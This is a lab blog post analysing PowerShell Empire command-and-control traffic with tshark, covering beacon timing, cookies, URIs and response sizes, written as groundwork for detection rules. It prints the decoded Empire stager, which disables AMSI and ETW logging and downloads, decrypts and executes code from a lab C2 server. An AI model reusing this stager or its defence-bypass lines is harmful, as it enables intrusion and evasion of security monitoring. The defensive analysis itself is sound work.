Learning by practicing

Wednesday, February 2, 2022

Beginning PowerShell Empire - Packet Analysis

Now that I have a better understanding of Powershell empire through the lens of the attack and the logs, time to take a look at the packets as they flew by on the wire.

The following capture was setup while the activity was being performed. Note, I'm not attempting to decrypt the traffic, I'm just trying to understand what is occurring. At the same time, I have this link in the reference , that guides you on how to decrypt the communication if needed.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tcpdump -nnti eth0 'host 10.0.0.110 and not arp and not net 224.0.0 and not port 138' -w empire-full-session.pcap  -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Got 0

Looking at the first few packets during the connection stage. Knowing this communication is being done over HTTP, let's see what some of this connection looks like from the perspective of the compromise machine at 10.0.0.110.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.110) and (tcp.port == 443)' -T fields -e http.request.method -e http.request.uri -e http.cookie_pair -e http.user_agent -E header=y | sort | uniq | more

http.request.method     http.request.uri        http.cookie_pair        http.user_agent
GET     /admin/get.php  session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=    Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
GET     /news.php       SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   securitynik-launcher-bat-User-Agent
POST    /news.php               securitynik-launcher-bat-User-Agent

Adding the frame time field

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.110) and (tcp.port == 443)' -T fields -e frame.time -e http.request.method -e http.request.uri -e http.cookie_pair -e http.user_agent -E header=y | sort | uniq | more
frame.time      http.request.method     http.request.uri        http.cookie_pair        http.user_agent
Nov 20, 2021 13:03:59.632366000 EST     GET     /news.php       SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   securityn
ik-launcher-bat-User-Agent
Nov 20, 2021 13:04:02.701118000 EST     POST    /news.php               securitynik-launcher-bat-User-Agent
Nov 20, 2021 13:04:03.514507000 EST     POST    /news.php               securitynik-launcher-bat-User-Agent
Nov 20, 2021 13:05:06.697535000 EST     GET     /admin/get.php  session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=    Mozilla/5.0 (Windows NT 6.1; WOW6

Looks like the first few packets were GET and POST requests for news.php. Finally we see a request for admin/get.php.

Taking a look from the attacker's machine perspective (10.0.0.107) to see what was returned.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.107)' -T fields -e http.response.code -e http.server -e http.content_length_header -e http.response_for.uri -e http.cache_control -E header=y | sort | uniq | more
http.response.code      http.server     http.content_length_header      http.response_for.uri   http.cache_control
200     Microsoft-IIS/7.5       1279    http://10.0.0.107:443/admin/get.php     no-cache, no-store, must-revalidate
200     Microsoft-IIS/7.5       256     http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
200     Microsoft-IIS/7.5       44506   http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
200     Microsoft-IIS/7.5       5452    http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate

Adding the frame time.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.107)' -T fields -e frame.time -e http.response.code -e http.server -e http.content_length_header -e http.response_for.uri -e http.cache_control -E header=y

frame.time      http.response.code      http.server     http.content_length_header      http.response_for.uri   http.cache_control
Nov 20, 2021 13:03:59.708871000 EST     200     Microsoft-IIS/7.5       5452    http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
Nov 20, 2021 13:04:02.931861000 EST     200     Microsoft-IIS/7.5       256     http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
Nov 20, 2021 13:04:03.628589000 EST     200     Microsoft-IIS/7.5       44506   http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
Nov 20, 2021 13:05:06.756213000 EST     200     Microsoft-IIS/7.5       1279    http://10.0.0.107:443/admin/get.php     no-cache, no-store, must-revalidate

The server returned 200 response code for the various requests. It looks like the final news.php request was the largest with 44506 bytes. Let's peak into this to see what it might be.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(http.content_length_header == 44506)' -V  | more 
...

Line-based text data: text/html (351 lines)
     [truncated])�qX$J�iYQ���\017���(\026�����*�4\006n��q)x<k\017:\000 �9�������e��^��SHΦ����f��[��R��o$���\016%��kڸ�[�h�k\004�\000�P\020
gU�`
    �J���2-�y\v;�T�a\r
    �+P�X�\t�\0201�����{�x��\004��\003��Q��[VW�E���qi8�Pk�w0\000+�b�)�{Ô�=��!&�*y�R��F���}��\r
     [truncated]�\034έ�G4c�@�k\a�ь�&eϙ��^�0'c\026\f`\032R.5�(^�\021\u07B5�$��8\006\024ί�{(���\022k�mO��_��\024��vI�e ���q�l��d�\017"(&�@\
022�\025�\026;z-E�]a�]Q
     [truncated]\033��\�a�\t\035���8�\f�\016[\�0�C\004�\032�\036Ƃ��w�2�!�-\��n)�#n��q���#>��\v���\025�+\035`�\033x���\021�\005��H�K�m#`Hw
...

Definitely does not look like line based text.

I also noticed Tshark reporting the following:

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -t ad -q -z expert,warns
Warns (8)
=============
   Frequency      Group           Protocol  Summary
           8   Security               HTTP  Unencrypted HTTP protocol detected over encrypted port, could indicate a dangerous misconfiguration.

Looking at the cookie information.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad  -T fields -e frame.time -e ip.src -e ip.dst -e http.cookie_pair  -E header=y | more  
frame.time      ip.src  ip.dst  http.cookie_pair
Nov 20, 2021 13:03:59.632366000 EST     10.0.0.110      10.0.0.107      SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=
Nov 20, 2021 13:05:06.697535000 EST     10.0.0.110      10.0.0.107      session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=

I was hoping to see the same cookie. When I add the http.uri field I see it seems the difference is between requesting news.php vs admin/get.php

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad  -T fields -e frame.time -e ip.src -e ip.dst -e http.cookie_pair -e http.request.uri -E header=y | more
frame.time      ip.src  ip.dst  http.cookie_pair        http.request.uri
Nov 20, 2021 13:03:59.632366000 EST     10.0.0.110      10.0.0.107      SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   /
news.php
Nov 20, 2021 13:05:06.697535000 EST     10.0.0.110      10.0.0.107      session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=    /admin/get.php

Looking at the packets when whoami was run from within powershell-empire interactive environment, we see.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-whoami.pcapng -t ad  -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.content_length_header -E header=y | more 
frame.number    ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.content_length_heade
r
1       10.0.0.110      1650    10.0.0.107      443     GET     /news.php
5       10.0.0.107      443     10.0.0.110      1650                    78
9       10.0.0.110      1650    10.0.0.107      443     POST    /login/process.php      94
14      10.0.0.107      443     10.0.0.110      1650                    1279

I'm going to assume (for now) the POST, packet 5 is the server sending the request and packet 9 is the client providing the response to whoami via the POST /login/process.php.

When the ps command is executed, I do not see the login/process.php but one again the news. Is it possible these files are being cycled through?

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.content_length_header -e http.response.code -E header=y | more 
frame.number    ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.content_length_header       http.response.code
4       10.0.0.107      443     10.0.0.110      1650                    62      200
7       10.0.0.110      1650    10.0.0.107      443     POST    /news.php       8078
12      10.0.0.107      443     10.0.0.110      1650                    1279    200

Looks like the Powershell Empire server sends the request to the client in packet 4 in a HTTP response 200 OK message, and gets a response back via a POST /news.php in packet 7. Packet 8 interestingly it reports the page is not found.

Looking at frame 4, we see.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 4'                                                       
    4 2021-11-20 14:36:15.708022   10.0.0.107 → 10.0.0.110   HTTP 324 HTTP/1.1 200 OK  (text/html)

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 4' -T fields -e http.file_data
���\r���7N���R-S���V���k&��Y4ULYJ����`[=�������j.F+��{'0�Vy��

Looking at the response in frame 5, we see.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 7'
    7 2021-11-20 14:36:26.478808   10.0.0.110 → 10.0.0.107   HTTP 8132 POST /news.php HTTP/1.1 

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 7' -T fields -e http.file_data
����m���!'�����%�#�6��������\to�A�0I�����-���8/��a���0�p����opfn{|\n.[�d�~\fh����S�����C�=6\tk��~�h�����{�}��"�qJDj`:�Bd���Z��'K%R�s\n[��$���}d��

Finally in frame 12

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 12' 
   12 2021-11-20 14:36:26.519843   10.0.0.107 → 10.0.0.110   HTTP 83 HTTP/1.1 200 OK  (text/html)

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 12' -T fields -e http.file_data
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style ...... <h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n  <h2>404 - File or directory not found.</h2>\r\n  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n

There are truly a lot of these messages in the communication.

Going forward this analysis will now focus on what I see overall and not the results of a specific command. We would only benefit from the output of a specific command, if we were to decrypt the communication. Since I'm looking at this from a general perspective, I will keep it simple moving forward.

So we saw alot above, but not really anything that really helped us to look deep into the activities. We could infer but we cannot confirm.

Therefore let's look back again at a snapshot of the welcome.bat which represents the Powershell stager to understand what is going on inside of this content.

┌──(root💀securitynik)-[/tmp]
└─# cat welcome.bat 
# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBmAC4ARwBFAFQARgBpAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARg...ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Looking above, we see the content is base64 encoded. Let's attempt to decode this base64 encoded content using the base64 --decode.

┌──(root💀securitynik)-[/tmp]
└─# echo "SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwB...AoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 --decode
If($PSVERSioNTaBlE.PSVErsioN.MaJoR -gE 3){$REF=[REf].AsSEmBlY.GEtTyPE('System.Management.Automation.Amsi'+'Utils');$REf.GETFiELD('amsiInitF'+'ailed','NonPublic,Static').SEtValUE($NUlL,$True);[System.Diagnostics.Eventing.EventProvider]."GetFie`ld"('m_e'+'nabled','Non'+'Public,'+'Instance').SetValue([Ref].Assembly.GetType('Syste'+'m.Management.Automation.Tracing.PSE'+'twLogProvider')."GetFie`ld"('et'+'wProvider','NonPub'+'lic,S'+'tatic').GetValue($null),0);};[SysTEM.NeT.SerVicePOiNtManAGER]::EXPeCt100COnTINUE=0;$b48e=NeW-ObJECT SystEM.NET.WebCLIent;$u='securitynik-launcher-bat-User-Agent';$ser=$([TEXT.ENCoDInG]::UniCODe.GETStriNg([ConvErT]::FRoMBaSe64StrING('aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMAAuADEAMAA3ADoANAA0ADMA')));$t='/news.php';$b48e.HeadeRS.AdD('User-Agent',$u);$B48e.PRoXy=[SYsTem.Net.WEBREqUesT]::DefAULTWEbPrOXy;$b48e.ProXy.CredeNTiALS = [SYSTEM.NET.CrEdeNTIaLCaChe]::DEfaultNETWorKCReDentIals;$Script:Proxy = $b48e.Proxy;$K=[SYsTEm.TeXT.ENcODInG]::ASCII.GeTBYtes('?4M6q)cLnvli}UCsu:rwf![~]79{#=O/');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$B48E.HeadeRs.Add("Cookie","SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=");$datA=$B48e.DownLOaDDaTA($sEr+$T);$Iv=$DaTa[0..3];$DAtA=$daTa[4..$data.leNGth];-jOIn[CHaR[]](& $R $daTa ($IV+$K))|IEX

Good stuff! We have peeled back the first layer of the onion. From above, we see some cleartext values that made sense, while also seeing what seems to be even further base64 encoded content such as:

:FRoMBaSe64StrING('aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMAAuADEAMAA3ADoANAA0ADMA')

When we decode this new string, we see:

┌──(root💀securitynik)-[~/packets]
└─# echo 'aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMAAuADEAMAA3ADoANAA0ADMA' | base64 --decode
http://10.0.0.107:443

Good stuff, we we able to recover the URL to which the host should communicate with. Knowing that for example the request was for news.php, we can conclude this first request looked like http://10.0.0.107:443/news.php. I do find this URL interesting. I was expecting to see https rather than HTTP. However, I guess the port 443 forced the communication over https rather than HTTP. .

We also see information on the cookie.

("Cookie","SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=")

Attempting the decode the Cookie, assuming it is base64, we see nothing meaningful.

┌──(root💀securitynik)-[/tmp]
└─# echo "ZOkMw8YjkW24L0AxacILe8erL8s=" | base64 --decode
d�
  ��#�m�/@1i�
             {ǫ/�

We also see in the base64 encoded content.

ASCII.GeTBYtes('?4M6q)cLnvli}UCsu:rwf![~]79{#=O/')

This value ties back to the StagingKey which was defined during the setup of the Listener. It is also used as input to the encryption algorithm.

Digging deeper. Extracting packets 8 and 13 and taking a closer look, we see the client made a GET request for /news.php and the server responded with a 200 OK. This suggest the request resource was received successfully.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 8) || (frame.number == 13)'                                                  
    8 2021-11-20 13:03:59.632367   10.0.0.110 → 10.0.0.107   HTTP 246 GET /news.php HTTP/1.1 
   13 2021-11-20 13:03:59.708872   10.0.0.107 → 10.0.0.110   HTTP 1336 HTTP/1.1 200 OK  (text/html)

Extracting a few fields to take a look at this from a different perspective, we see below the client's get request has a TCP length of 192 bytes, while the server's HTTP response was 5452 bytes. This is a significant download.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 8) || (frame.number == 13)' -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.cookie_pair -e tcp.len -e http.content_length_header -E header=y
ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.response.code      http.cookie_pair        tcp.len http.content_length_header
10.0.0.110      1650    10.0.0.107      443     GET     /news.php               SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   192
10.0.0.107      443     10.0.0.110      1650                    200             1282    5452

Looking at frames 17 and 21, we see, we now see the client making a POST and the server returned a 200 OK message.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 17) || (frame.number == 21)'
   17 2021-11-20 13:04:02.701119   10.0.0.110 → 10.0.0.107   HTTP 516 POST /news.php HTTP/1.1 
   21 2021-11-20 13:04:02.931862   10.0.0.107 → 10.0.0.110   HTTP 519 HTTP/1.1 200 OK  (text/html)

Expanding the fields like we did above, we see the client POST consists of 462 bytes. The server responds with a 256 bytes. Attempting to look at either the bytes sent in the POST or the response will not benefit us, as we already know this traffic is encrypted.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 17) || (frame.number == 21)' -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.cookie_pair -e tcp.len -e http.content_length_header -E header=y
ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.response.code      http.cookie_pair        tcp.len http.content_length_header
10.0.0.110      1650    10.0.0.107      443     POST    /news.php                       462     462
10.0.0.107      443     10.0.0.110      1650                    200             465     256

Continuing along this path, we see in frame 25, the client makes yet another POST, sending 256 bytes, with the server responding with 200 OK in packet 42. The server sends back a massive 44506 bytes.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 25) || (frame.number == 42)'
   25 2021-11-20 13:04:03.514509   10.0.0.110 → 10.0.0.107   HTTP 260 POST /news.php HTTP/1.1 
   42 2021-11-20 13:04:03.628591   10.0.0.107 → 10.0.0.110   HTTP 5351 HTTP/1.1 200 OK  (text/html)

To get a better view of this, let's expand the fields again.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 25) || (frame.number == 42)' -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.cookie_pair -e tcp.len -e http.content_length_header -E header=y
ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.response.code      http.cookie_pair        tcp.len http.content_length_header
10.0.0.110      1650    10.0.0.107      443     POST    /news.php                       206     206
10.0.0.107      443     10.0.0.110      1650                    200             5297    44506

According to Ayan Saha, this represents the end of the 3 phases the tool used to setup.

From here on, the client sends regular GET request, beaconing home to get the tasks it needs to execute.

Looking at the statistical analysis for the URLs requested.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -Y '(ip.src == 10.0.0.110) && (tcp.port == 443) && (http.request.method == "GET")' -T fields -e ip.src -e http.request.uri | sort | uniq --count | sort --numeric --reverse
    563 10.0.0.110      /admin/get.php
    540 10.0.0.110      /news.php
    493 10.0.0.110      /login/process.php

Considering the above, let's look at the 60 second frequencies within these pages are each seen. Starting with /admin/get.php. Primary reason for the 60 minute window, is because we set the delay to 60 second when configuring the the listener.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")' | more
======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")                     |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |
| 2021-11-20 13:02:57 |      0 |     0 |                                                             |
| 2021-11-20 13:03:57 |      0 |     0 |                                                             |
| 2021-11-20 13:04:57 |      1 |   235 |                                                             |
| 2021-11-20 13:05:57 |      0 |     0 |                                                             |
| 2021-11-20 13:06:57 |      0 |     0 |                                                             |
| ... TRUNCATED FOR BREVITY ....                                                                     |
======================================================================================================

Above we can see some 0s, being seen at this 1 minute intervals, let's remove those to get more meaningful information.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")' | grep --invert-match --perl-regexp "\s+0\s+" | more

======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")                     |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |
| ...                                  |                                                             |
| 2021-11-20 13:19:57 |      1 |   235 |                                                             |
| 2021-11-20 13:30:57 |      1 |   235 |                                                             |
| 2021-11-20 17:17:57 |      1 |   235 |                                                             |
| 2021-11-20 17:18:57 |      1 |   235 |                                                             |
| 2021-11-20 17:19:57 |      2 |   470 |                                                             |
| 2021-11-20 17:20:57 |      2 |   470 |                                                             |
| 2021-11-20 17:21:57 |      2 |   470 |                                                             |
| 2021-11-20 17:22:57 |      2 |   470 |                                                             |
| 2021-11-20 17:23:57 |      1 |   235 |                                                             |
| 2021-11-20 17:24:57 |      1 |   235 |                                                             |
| 2021-11-20 17:25:57 |      1 |   235 |                                                             |
| 2021-11-20 17:26:57 |      3 |   705 |                                                             |
| 2021-11-20 17:28:57 |      3 |   705 |                                                             |
| 2021-11-20 17:29:57 |      2 |   470 |                                                             |
| 2021-11-20 17:30:57 |      1 |   235 |                                                             |
| 2021-11-20 17:31:57 |      1 |   235 |                                                             |
| 2021-11-21 19:08:57 |      1 |   235 |                                                             |
| 2021-11-21 19:09:57 |      1 |   235 |                                                             |
======================================================================================================

Looking at a snapshot of the data above, we can clearly see a pattern every 60 seconds.

Doing the same for news.php, we see.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/news.php")' | grep --invert-match --perl-regexp "\s+0\s+" | more

======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/news.php")                          |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |

| 2021-11-21 18:54:57 |      2 |   460 |                                                             |
| 2021-11-21 18:55:57 |      1 |   230 |                                                             |
| 2021-11-21 18:56:57 |      2 |   460 |                                                             |
| 2021-11-21 18:57:57 |      1 |   230 |                                                             |
| 2021-11-21 18:58:57 |      2 |   460 |                                                             |
| 2021-11-21 18:59:57 |      1 |   230 |                                                             |
| 2021-11-21 19:00:57 |      2 |   460 |                                                             |
| 2021-11-21 19:06:57 |      1 |   230 |                                                             |
| 2021-11-21 19:07:57 |      1 |   230 |                                                             |
| 2021-11-21 19:08:57 |      1 |   230 |                                                             |
| 2021-11-21 19:09:57 |      1 |   230 |                                                             |
| 2021-11-21 19:10:57 |      1 |   230 |                                                             |
| 2021-11-21 19:11:57 |      1 |   230 |                                                             |
| 2021-11-21 19:12:57 |      2 |   460 |                                                             |
======================================================================================================

and finally for /login/process.php.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/login/process.php")' | grep --invert-match --perl-regexp "\s+0\s+" | more

======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/login/process.php")                 |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |
| 2021-11-20 13:05:57 |      1 |   239 |                                                             |
| 2021-11-20 13:06:57 |      1 |   239 |                                                             |
| 2021-11-20 13:07:57 |      1 |   239 |                                                             |
| 2021-11-20 13:09:57 |      1 |   239 |                                                             |
| 2021-11-21 14:22:57 |      1 |   239 |                                                             |
| 2021-11-21 14:23:57 |      2 |   478 |                                                             |
| 2021-11-21 14:24:57 |      2 |   478 |                                                             |
| 2021-11-21 14:25:57 |      1 |   239 |                                                             |
| 2021-11-21 14:26:57 |      1 |   239 |                                                             |
| 2021-11-21 14:35:57 |      1 |   239 |                                                             |
| 2021-11-21 14:36:57 |      1 |   239 |                                                             |
| 2021-11-21 14:37:57 |      1 |   239 |                                                             |
| 2021-11-21 14:38:57 |      2 |   478 |                                                             |
| 2021-11-21 15:24:57 |      1 |   239 |                                                             |
| 2021-11-21 15:26:57 |      2 |   478 |                                                             |
| 2021-11-21 15:27:57 |      2 |   478 |                                                             |
| 2021-11-21 15:28:57 |      1 |   239 |                                                             |
| 2021-11-21 15:29:57 |      1 |   239 |                                                             |
| 2021-11-21 15:30:57 |      1 |   239 |                                                             |
| 2021-11-21 15:31:57 |      1 |   239 |                                                             |
| 2021-11-21 16:03:57 |      1 |   239 |                                                             |
| 2021-11-21 16:04:57 |      1 |   239 |                                                             |
| 2021-11-21 16:05:57 |      1 |   239 |                                                             |
| 2021-11-21 16:06:57 |      1 |   239 |                                                             |
| 2021-11-21 16:07:57 |      1 |   239 |                                                             |
======================================================================================================

Clearly we can see some patterns above as it relates to the communication at 60 minute intervals.

I also noticed alot of these messages report 404 - file or directory not found. It seems like almost every response had this message.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connection-setup.pcapng -V | grep --perl-regexp "404\s+.*?not\s+found" | more                             
    <title>404 - File or directory not found.</title>\r\n
      <h2>404 - File or directory not found.</h2>\r\n
    <title>404 - File or directory not found.</title>\r\n
      <h2>404 - File or directory not found.</h2>\r\n
    <title>404 - File or directory not found.</title>\r\n
      <h2>404 - File or directory not found.</h2>\r\n
    <title>404 - File or directory not found.</title>\r\n
    ....

Transitioning to developing Snort3 rules, to detect this activity for our lab.

Other posts in this series:

Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek

References:

https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/06/16/empire_c2_-_networki-C4rq.html

https://stackoverflow.com/questions/38546887/decrypting-powershell-empire

https://www.giac.org/paper/gcfa/13277/disrupting-empire-identifying-powershell-empire-command-control-activity/152744

https://medium.com/@nikhilsda/encryption-and-decryption-in-powershell-e7a678c5cd7d

https://docs.python.org/3/library/base64.html

https://pycryptodome.readthedocs.io/en/latest/src/cipher/arc4.html

https://www.geeksforgeeks.org/python-convert-string-to-bytes/

https://stackoverflow.com/questions/29607753/how-to-decrypt-a-file-that-encrypted-with-rc4-using-python

https://blog.finxter.com/python-convert-unicode-to-bytes-ascii-utf-8-raw-string/

https://plaintext.do/AV-Evasion-Converting-PowerEmpire-Stage-1-to-CSharp-EN/

https://www.harmj0y.net/blog/powershell/powershell-rc4/

https://stackoverflow.com/questions/38546887/decrypting-powershell-empire

https://medium.com/@nikhilsda/encryption-and-decryption-in-powershell-e7a678c5cd7d

Beginning PowerShell Empire - Log Analysis

Looking at the logs from some of this activity as it was being performed during my learning of Powershell Empire.

